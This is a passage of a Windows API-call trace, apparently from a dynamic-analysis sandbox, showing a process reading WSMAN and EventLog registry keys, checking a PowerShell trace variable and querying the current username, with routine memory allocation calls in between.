	[0607.051] RegQueryValueExW (in: hKey=0x2f0, lpValueName="StackVersion", lpReserved=0x0, lpType=0xccfec, lpData=0x0, lpcbData=0xccfe8*=0x0 | out: lpType=0xccfec*=0x1, lpData=0x0, lpcbData=0xccfe8*=0x8) returned 0x0
	[0607.051] CoTaskMemAlloc (cb=0xc) returned 0x1b3bc220
	[0607.051] RegQueryValueExW (in: hKey=0x2f0, lpValueName="StackVersion", lpReserved=0x0, lpType=0xccfbc, lpData=0x1b3bc220, lpcbData=0xccfb8*=0x8 | out: lpType=0xccfbc*=0x1, lpData="2.0", lpcbData=0xccfb8*=0x8) returned 0x0
	[0607.051] CoTaskMemFree (pv=0x1b3bc220) 
	[0608.083] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfa8 | out: phkResult=0xccfa8*=0x2f0) returned 0x0
	[0608.083] RegQueryInfoKeyW (in: hKey=0x2f0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcceac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccea8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcceac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccea8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0608.083] CoTaskMemFree (pv=0x0) 
	[0608.083] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0608.083] RegEnumValueW (in: hKey=0x2f0, dwIndex=0x0, lpValueName=0x23c760, lpcchValueName=0xccf58, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xccf58, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0608.083] CoTaskMemFree (pv=0x23c760) 
	[0608.083] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0608.083] RegEnumValueW (in: hKey=0x2f0, dwIndex=0x1, lpValueName=0x23c760, lpcchValueName=0xccf58, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xccf58, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0608.084] CoTaskMemFree (pv=0x23c760) 
	[0608.084] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0608.084] RegEnumValueW (in: hKey=0x2f0, dwIndex=0x2, lpValueName=0x23c760, lpcchValueName=0xccf58, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xccf58, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0608.084] CoTaskMemFree (pv=0x23c760) 
	[0608.084] RegQueryValueExW (in: hKey=0x2f0, lpValueName="StackVersion", lpReserved=0x0, lpType=0xccf3c, lpData=0x0, lpcbData=0xccf38*=0x0 | out: lpType=0xccf3c*=0x1, lpData=0x0, lpcbData=0xccf38*=0x8) returned 0x0
	[0608.084] CoTaskMemAlloc (cb=0xc) returned 0x1b3bc2c0
	[0608.084] RegQueryValueExW (in: hKey=0x2f0, lpValueName="StackVersion", lpReserved=0x0, lpType=0xccf0c, lpData=0x1b3bc2c0, lpcbData=0xccf08*=0x8 | out: lpType=0xccf0c*=0x1, lpData="2.0", lpcbData=0xccf08*=0x8) returned 0x0
	[0608.084] CoTaskMemFree (pv=0x1b3bc2c0) 
	[0608.085] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0608.085] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0608.086] CoTaskMemFree (pv=0x2a8780) 
	[0609.073] CoTaskMemAlloc (cb=0x104) returned 0x2a8780
	[0609.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2a8780, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0609.074] CoTaskMemFree (pv=0x2a8780) 
	[0609.080] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfd8 | out: phkResult=0xccfd8*=0x2f4) returned 0x0
	[0609.085] RegQueryInfoKeyW (in: hKey=0x2f4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xccf4c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccf48, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xccf4c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccf48*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.085] CoTaskMemFree (pv=0x0) 
	[0609.086] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0609.086] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x0, lpName=0x23c760, lpcchName=0xccfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xccfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.086] CoTaskMemFree (pv=0x23c760) 
	[0609.086] CoTaskMemFree (pv=0x0) 
	[0609.086] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0609.086] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x1, lpName=0x23c760, lpcchName=0xccfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xccfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.086] CoTaskMemFree (pv=0x23c760) 
	[0609.086] CoTaskMemFree (pv=0x0) 
	[0609.086] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0609.086] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x2, lpName=0x23c760, lpcchName=0xccfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xccfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.086] CoTaskMemFree (pv=0x23c760) 
	[0609.086] CoTaskMemFree (pv=0x0) 
	[0609.086] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0609.087] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x3, lpName=0x23c760, lpcchName=0xccfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xccfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.087] CoTaskMemFree (pv=0x23c760) 
	[0609.087] CoTaskMemFree (pv=0x0) 
	[0609.087] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0609.087] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x4, lpName=0x23c760, lpcchName=0xccfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xccfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.087] CoTaskMemFree (pv=0x23c760) 
	[0609.087] CoTaskMemFree (pv=0x0) 
	[0609.087] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0609.087] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x5, lpName=0x23c760, lpcchName=0xccfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xccfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.087] CoTaskMemFree (pv=0x23c760) 
	[0609.087] CoTaskMemFree (pv=0x0) 
	[0609.087] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0609.087] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x6, lpName=0x23c760, lpcchName=0xccfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xccfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.087] CoTaskMemFree (pv=0x23c760) 
	[0609.087] CoTaskMemFree (pv=0x0) 
	[0609.088] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0609.088] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x7, lpName=0x23c760, lpcchName=0xccfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xccfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.088] CoTaskMemFree (pv=0x23c760) 
	[0609.088] CoTaskMemFree (pv=0x0) 
	[0609.088] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0609.088] RegEnumKeyExW (in: hKey=0x2f4, dwIndex=0x8, lpName=0x23c760, lpcchName=0xccfd8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xccfd8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0609.088] CoTaskMemFree (pv=0x23c760) 
	[0609.088] CoTaskMemFree (pv=0x0) 
	[0609.088] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x32c) returned 0x0
	[0609.088] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x0) returned 0x2
	[0609.088] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x2fc) returned 0x0
	[0609.088] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x0) returned 0x2
	[0609.089] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x300) returned 0x0
	[0609.089] RegOpenKeyExW (in: hKey=0x300, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x0) returned 0x2
	[0609.089] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x304) returned 0x0
	[0609.089] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x0) returned 0x2
	[0609.089] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x2e0) returned 0x0
	[0609.089] RegOpenKeyExW (in: hKey=0x2e0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x0) returned 0x2
	[0609.089] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x330) returned 0x0
	[0609.090] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x0) returned 0x2
	[0609.090] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x334) returned 0x0
	[0609.090] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x0) returned 0x2
	[0609.090] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x338) returned 0x0
	[0609.090] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x0) returned 0x2
	[0609.090] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x33c) returned 0x0
	[0609.090] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd038 | out: phkResult=0xcd038*=0x340) returned 0x0
	[0609.090] RegCloseKey (hKey=0x340) returned 0x0
	[0609.091] RegCloseKey (hKey=0x2f4) returned 0x0
	[0609.092] RegCloseKey (hKey=0x33c) returned 0x0
	[0610.169] CoTaskMemAlloc (cb=0x804) returned 0x1b3e9f30
	[0610.169] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3e9f30, nSize=0xcd248 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd248) returned 0x1
	[0610.170] CoTaskMemFree (pv=0x1b3e9f30) 
	[0610.171] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0610.171] GetUserNameW (in: lpBuffer=0x23c760, pcbBuffer=0xcd288 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd288) returned 1
	[0610.172] CoTaskMemFree (pv=0x23c760) 
	[0612.055] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf88 | out: phkResult=0xccf88*=0x344) returned 0x0
	[0612.055] RegQueryInfoKeyW (in: hKey=0x344, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xccefc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccef8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xccefc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccef8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.055] CoTaskMemFree (pv=0x0) 
	[0612.055] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.055] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x0, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.055] CoTaskMemFree (pv=0x23c760) 
	[0612.055] CoTaskMemFree (pv=0x0) 
	[0612.055] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.055] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x1, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.055] CoTaskMemFree (pv=0x23c760) 
	[0612.055] CoTaskMemFree (pv=0x0) 
	[0612.055] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.055] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x2, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.056] CoTaskMemFree (pv=0x23c760) 
	[0612.056] CoTaskMemFree (pv=0x0) 
	[0612.056] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.056] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x3, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.056] CoTaskMemFree (pv=0x23c760) 
	[0612.056] CoTaskMemFree (pv=0x0) 
	[0612.056] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.056] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x4, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.056] CoTaskMemFree (pv=0x23c760) 
	[0612.056] CoTaskMemFree (pv=0x0) 
	[0612.056] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.056] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x5, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.056] CoTaskMemFree (pv=0x23c760) 
	[0612.056] CoTaskMemFree (pv=0x0) 
	[0612.056] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.056] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x6, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.056] CoTaskMemFree (pv=0x23c760) 
	[0612.056] CoTaskMemFree (pv=0x0) 
	[0612.056] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.057] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x7, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.057] CoTaskMemFree (pv=0x23c760) 
	[0612.057] CoTaskMemFree (pv=0x0) 
	[0612.057] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.057] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x8, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.057] CoTaskMemFree (pv=0x23c760) 
	[0612.057] CoTaskMemFree (pv=0x0) 
	[0612.057] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x348) returned 0x0
	[0612.057] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x0) returned 0x2
	[0612.057] RegOpenKeyExW (in: hKey=0x344, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x34c) returned 0x0
	[0612.057] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x0) returned 0x2
	[0612.057] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x350) returned 0x0
	[0612.058] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x0) returned 0x2
	[0612.058] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x354) returned 0x0
	[0612.058] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x0) returned 0x2
	[0612.058] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x358) returned 0x0
	[0612.058] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x0) returned 0x2
	[0612.058] RegOpenKeyExW (in: hKey=0x344, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x35c) returned 0x0
	[0612.058] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x0) returned 0x2
	[0612.058] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x360) returned 0x0
	[0612.058] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x0) returned 0x2
	[0612.058] RegOpenKeyExW (in: hKey=0x344, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x364) returned 0x0
	[0612.059] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x0) returned 0x2
	[0612.059] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x368) returned 0x0
	[0612.059] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xccfe8 | out: phkResult=0xccfe8*=0x36c) returned 0x0
	[0612.059] RegCloseKey (hKey=0x36c) returned 0x0
	[0612.059] RegCloseKey (hKey=0x344) returned 0x0
	[0612.060] RegCloseKey (hKey=0x368) returned 0x0
	[0612.060] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xccf88 | out: phkResult=0xccf88*=0x368) returned 0x0
	[0612.060] RegQueryInfoKeyW (in: hKey=0x368, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xccefc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccef8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xccefc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xccef8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.061] CoTaskMemFree (pv=0x0) 
	[0612.061] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.061] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x0, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.061] CoTaskMemFree (pv=0x23c760) 
	[0612.061] CoTaskMemFree (pv=0x0) 
	[0612.061] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.061] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x1, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.061] CoTaskMemFree (pv=0x23c760) 
	[0612.061] CoTaskMemFree (pv=0x0) 
	[0612.061] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.061] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x2, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.061] CoTaskMemFree (pv=0x23c760) 
	[0612.061] CoTaskMemFree (pv=0x0) 
	[0612.061] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.061] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x3, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.062] CoTaskMemFree (pv=0x23c760) 
	[0612.062] CoTaskMemFree (pv=0x0) 
	[0612.062] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.062] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x4, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.062] CoTaskMemFree (pv=0x23c760) 
	[0612.062] CoTaskMemFree (pv=0x0) 
	[0612.062] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.062] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x5, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.062] CoTaskMemFree (pv=0x23c760) 
	[0612.062] CoTaskMemFree (pv=0x0) 
	[0612.062] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.062] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x6, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.062] CoTaskMemFree (pv=0x23c760) 
	[0612.062] CoTaskMemFree (pv=0x0) 
	[0612.062] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.062] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x7, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.063] CoTaskMemFree (pv=0x23c760) 
	[0612.063] CoTaskMemFree (pv=0x0) 
	[0612.063] CoTaskMemAlloc (cb=0x204) returned 0x23c760
	[0612.063] RegEnumKeyExW (in: hKey=0x368, dwIndex=0x8, lpName=0x23c760, lpcchName=0xccf88, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xccf88, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0612.063] CoTaskMemFree (pv=0x23c760) 
	[0612.063] CoTaskMemFree (pv=0x0) 
